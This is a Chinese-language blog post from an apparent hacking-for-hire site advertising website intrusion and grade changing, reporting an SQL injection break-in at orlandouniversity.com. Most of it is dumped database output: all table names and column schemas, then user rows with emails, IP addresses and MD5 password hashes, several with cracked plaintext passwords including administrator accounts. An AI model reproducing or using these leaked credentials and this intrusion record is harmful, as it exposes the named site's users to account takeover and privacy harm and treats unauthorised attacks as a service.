对Orlando University的渗透测试

HackAPT - 打造中国最专业的黑客入侵技术长期承接国内外网站入侵,网络渗透,外挂开发,成绩修改等相关黑客业务. 本团队拥有多位资深老牌黑客,技术实力雄厚有着长期的职业黑客经验并且长期持有CEH,CCIE黑客认证,且长期活跃于Hackone排行榜并帮助过Facebook, Microsoft, Uber, Yahoo日本发现过重大漏洞. 我们的承诺和信心来自于多年入侵经验的成功案例,我们用实力来得到您的认可客服QQ:10172680 邮箱[email protected]
本站所有内容均属于本站原创,部分内容经原创作者授权后转载.
这次直入喉咙:http://www.orlandouniversity.com/
声明:以下文章仅限技术研究和学习参考,因为本站内容导致一切法律责任均于本站无关!
强烈鄙视抄袭文章的那群拷贝党…..
检测到的两个table[2]:
漏洞非常明显直接sql注入 拿下了学校%90上的账户及学生资料,关于后面的内网上渗透本文就不会详细涉及.
[*] information_schema
[*] orlandoedu
Database: orlandoedu
[195 tables]
+————————–+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advcaches |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_campaigns |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_videos |
| cdb_videotags |
| cdb_virtualforums |
| cdb_warnings |
| cdb_words |
| mp_about |
| mp_about_include |
| mp_about_setup |
| mp_ad |
| mp_article |
| mp_article_dir |
| mp_article_dir_include |
| mp_article_include |
| mp_blog_comm |
| mp_blog_logs |
| mp_blog_logs_dir |
| mp_blog_logs_dir_include |
| mp_blog_logs_include |
| mp_blog_photo_dir |
| mp_blog_setup |
| mp_case |
| mp_case_dir |
| mp_case_dir_include |
| mp_case_include |
| mp_comment |
| mp_comment_list |
| mp_contact |
| mp_contact_include |
| mp_down |
| mp_down_dir |
| mp_down_dir_include |
| mp_down_include |
| mp_feedback |
| mp_groups |
| mp_guest |
| mp_link |
| mp_link_include |
| mp_members |
| mp_menu |
| mp_mpb |
| mp_mpb_dir |
| mp_mpb_dir_include |
| mp_mpb_include |
| mp_news |
| mp_news_dir |
| mp_news_dir_include |
| mp_news_include |
| mp_person |
| mp_person3 |
| mp_person_include |
| mp_photo |
| mp_photo_dir |
| mp_photo_dir_include |
| mp_photo_include |
| mp_plugins |
| mp_product |
| mp_product_dir |
| mp_product_dir_include |
| mp_product_include |
| mp_product_orders |
| mp_resource |
| mp_resource_dir |
| mp_resource_dir_include |
| mp_resource_include |
| mp_service |
| mp_service_include |
| mp_service_online |
| mp_setup |
| mp_smtpmail |
| mp_stat |
| mp_stat_acc |
| mp_stat_ipk |
| mp_stat_ser |
| mp_stat_serkey |
| mp_stat_site |
| mp_statd |
| mp_stath |
| mp_statip |
| mp_statt |
| mp_vote |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+————————–+
Database: orlandoedu
Table: uc_members
[12 columns]
+—————+———————–+
| Column | Type |
+—————+———————–+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+—————+———————–+
Database: orlandoedu
Table: uc_members
[2 entries]
+—————–+———-+———————————-+
| email | username | password |
+—————–+———-+———————————-+
| [email protected] | admin | b4fce3aeabfadbeee3775d5548200385 |
| [email protected] | users | 905600c2d3f11141d12ce9344629a71e |
+—————–+———-+———————————-+
Database: orlandoedu
Table: cdb_access
[9 columns]
+—————–+———————–+
| Column | Type |
+—————–+———————–+
| adminuser | mediumint(8) unsigned |
| allowgetattach | tinyint(1) |
| allowpost | tinyint(1) |
| allowpostattach | tinyint(1) |
| allowreply | tinyint(1) |
| allowview | tinyint(1) |
| dateline | int(10) unsigned |
| fid | smallint(6) unsigned |
| uid | mediumint(8) unsigned |
+—————–+———————–+
Database: orlandoedu
Table: cdb_members
[23 columns]
+————–+———————–+
| Column | Type |
+————–+———————–+
| adminid | tinyint(1) |
| credits | int(10) |
| digestposts | smallint(6) unsigned |
| extcredits1 | int(10) |
| extcredits2 | int(10) |
| extcredits3 | int(10) |
| extgroupids | char(20) |
| gender | tinyint(1) |
| groupexpiry | int(10) unsigned |
| groupid | smallint(6) unsigned |
| lastactivity | int(10) unsigned |
| lastip | char(15) |
| lastpost | int(10) unsigned |
| lastvisit | int(10) unsigned |
| oltime | smallint(6) unsigned |
| pageviews | mediumint(8) unsigned |
| password | char(32) |
| posts | mediumint(8) unsigned |
| regdate | int(10) unsigned |
| regip | char(15) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+————–+———————–+
Database: orlandoedu
Table: cdb_members
[2 entries]
+———-+———————————————+
| username | password |
+———-+———————————————+
| admin | 7fef6171469e80d32c0559f88b377245 (admin888) |
| users | 8488f6f00cbbdafae346289fde96801e |
+———-+———————————————+
Database: orlandoedu
Table: uc_admins
[14 columns]
+——————-+———————–+
| Column | Type |
+——————-+———————–+
| allowadminapp | tinyint(1) |
| allowadminbadword | tinyint(1) |
| allowadmincache | tinyint(1) |
| allowadmincredits | tinyint(1) |
| allowadmindb | tinyint(1) |
| allowadmindomain | tinyint(1) |
| allowadminlog | tinyint(1) |
| allowadminnote | tinyint(1) |
| allowadminpm | tinyint(1) |
| allowadminsetting | tinyint(1) |
| allowadmintag | tinyint(1) |
| allowadminuser | tinyint(1) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+——————-+———————–+
Database: orlandoedu
Table: mp_members
[38 columns]
+————–+———————–+
| Column | Type |
+————–+———————–+
| address | varchar(150) |
| adminid | tinyint(1) |
| alipay | varchar(80) |
| available | tinyint(2) |
| avatar | varchar(150) |
| bday | varchar(10) |
| bmonth | varchar(10) |
| byear | varchar(10) |
| city | varchar(50) |
| content | text |
| credits | int(10) |
| edulevel | varchar(30) |
| email | char(50) |
| gender | tinyint(1) |
| groupid | smallint(6) unsigned |
| homepage | varchar(100) |
| idcard | varchar(80) |
| idtype | varchar(30) |
| income | varchar(30) |
| industry | varchar(30) |
| invisible | tinyint(1) |
| lastactivity | int(10) unsigned |
| lastpost | int(10) unsigned |
| mobile | varchar(50) |
| msn | varchar(80) |
| occupation | varchar(30) |
| oltime | smallint(6) unsigned |
| pageviews | mediumint(8) unsigned |
| password | char(32) |
| postid | varchar(20) |
| posts | mediumint(8) unsigned |
| qq | varchar(15) |
| regdate | int(10) unsigned |
| regip | char(15) |
| telephone | varchar(50) |
| truename | varchar(100) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+————–+———————–+
www.hackerfor.com
Database: orlandoedu
Table: mp_members
[9 entries]
+—————–+———————-+———-+———————————————-+
| regip | email | username | password |
+—————–+———————-+———-+———————————————-+
| <blank> | [email protected] | admin | a03b2b846be1ba7243c2d6a4dee462c3 (admin2009) |
| 127.0.0.1 | [email protected] | users | d351331735b1980b6dee831c10abbc0b |
| 127.0.0.1 | [email protected] | aaaaaa | 0b4e7a0e5fe84ad35fb5f95b9ceeac79 (aaaaaa) |
| 219.136.215.61 | [email protected] | admin123 | 0192023a7bbd73250516f069df18b500 (admin123) |
| 219.136.130.111 | [email protected] | 000000 | 670b14728ad9902aecba32e22fa4f6bd (000000) |
| 74.235.206.100 | [email protected] | zhao | 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 71.41.252.66 | [email protected] | LIRN | d6dde9c419627e42dc652074541343b7 |
| 74.235.222.113 | [email protected] | lfernald | 344c8024766ac77d11d5346b85cab6ad (lloyd) |
| 121.33.147.107 | [email protected] | easyhoo | 344f4ea8738d7805b9dff23bcf5ed224 (easyhoo) |、
管理员的账户密码这里都已经解好了,希望大家别干坏事.
详细渗透教程已经录为视频,如有技术交流请联系QQ.
上一篇:新疆师范大学内网漫游
下一篇:通过App入侵山东大学